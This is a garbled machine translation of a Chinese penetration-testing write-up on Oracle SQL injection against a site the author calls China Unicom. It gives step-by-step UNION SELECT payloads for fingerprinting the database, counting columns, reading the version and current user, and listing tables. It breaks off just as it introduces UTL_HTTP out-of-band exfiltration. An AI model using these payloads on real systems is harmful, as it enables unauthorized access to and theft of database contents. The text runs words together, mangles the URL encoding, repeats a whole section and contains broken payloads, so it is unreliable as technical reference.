Oralce rebound Injection

Author: Shandong Information Security Group Black. Eagle

It is estimated that you have read 《OracleOnce injected into the actual penetration of China Unicom, this article will be a shock, but I do not know whether readers and friends have ever encountered a situation similar to that of the author.Union selectWhen statements blow up all the tables, they won't be able to blow up at most, so how can we continue? Here we useUTL_HTTPRebound injection.

●Determine injection points

It is estimated that the injection point will be handled by manual judgment. The author uses the returned information"Java. SQL. SQLException:ORA-01756"Preliminary judgment is:Oracle.

●Determining database types

InUrlAdd"/*", Error page returned, excludingMysqlPossible Database

InUrlAdd"--"The normal page is displayed, indicating that the database may beMssqlOrOracle

For further verificationOracleDatabase, the author inUrlAdd later:"And (select count (*) from user_tables)> 0 --"Shows the normal page, which isOracle.

Note:User_tablesYesOracleDatabase-specific tables

● Guess Fields

Submitted by the author:Order by 7 --Return to the correct page

Continue submissionOrder by 8-The error page is returned, which confirms that the current table exists.7Fields

●Test Field Type

Submitted by the author:Union select null, null from dualReturn to the normal page. It is confirmed that the field is indeed seven

The next step is to determine the field type, because the field location of the struct type can be inserted into the content we want to query.

I submitted the test in sequence:

Union % 20 select % 20Null, Null % 20 from % 20 dual

Union % 20 select % 20 null,Null, Null % 20 from % 20 dual

Union % 20 select % 20 null, null,Null, Null % 20 from % 20 dual

Union % 20 select % 20 null,Null, Null % 20 from % 20 dual

......

This is submitted in turn. When the seven fields are tested, I find that1,3,4,6,7The location is balanced.

Submit:And % 201 = 2% 20 union % 20 select % 7%, 20 from % 20 dual

The next step is to determine the field type, because the field location of the struct type can be inserted into the content we want to query.

I submitted the test in sequence:

Union % 20 select % 20Null, Null % 20 from % 20 dual

Union % 20 select % 20 null,Null, Null % 20 from % 20 dual

Union % 20 select % 20 null, null,Null, Null % 20 from % 20 dual

Union % 20 select % 20 null,Null, Null % 20 from % 20 dual

......

This is submitted in turn. When the seven fields are tested, I find that1,3,4,6,7The location is balanced.

Submit:And % 201 = 2% 20 union % 20 select % 7%, 20 from % 20 dual

I testedOracleDatabase version, submit:

And % 201 = 2% 20 union % 20 select % 20 (select % 20 banner % 20 from % 20sys. v _ $ version % 20 where % 20 rownum = 1), 2, 3, 4, 5, 6, 7% 20 from % 20 dual, DisplayedOracle 10g

And it is determined that the current connected user isTOTO, Submit statement:

And % 201 = 2% 20 union % 20 select % 20 (select % 20SYS_CONTEXT % 20 (USERENV, % 20CURRENT_USER) % 20 from % 20 dual, 6, 7% 20 from % 20 dual

I encountered a problem when I burst the table, that is, when submitting:

And % 201 = 2% 20 union % 20 select % 20TABLE_NAME, from % 20USER_TABLESIn this case, all user tables are expected to be displayed. Some tables may be displayed due to a large number of tables and insufficient display length at the page.UTL_HTTPRebound injection.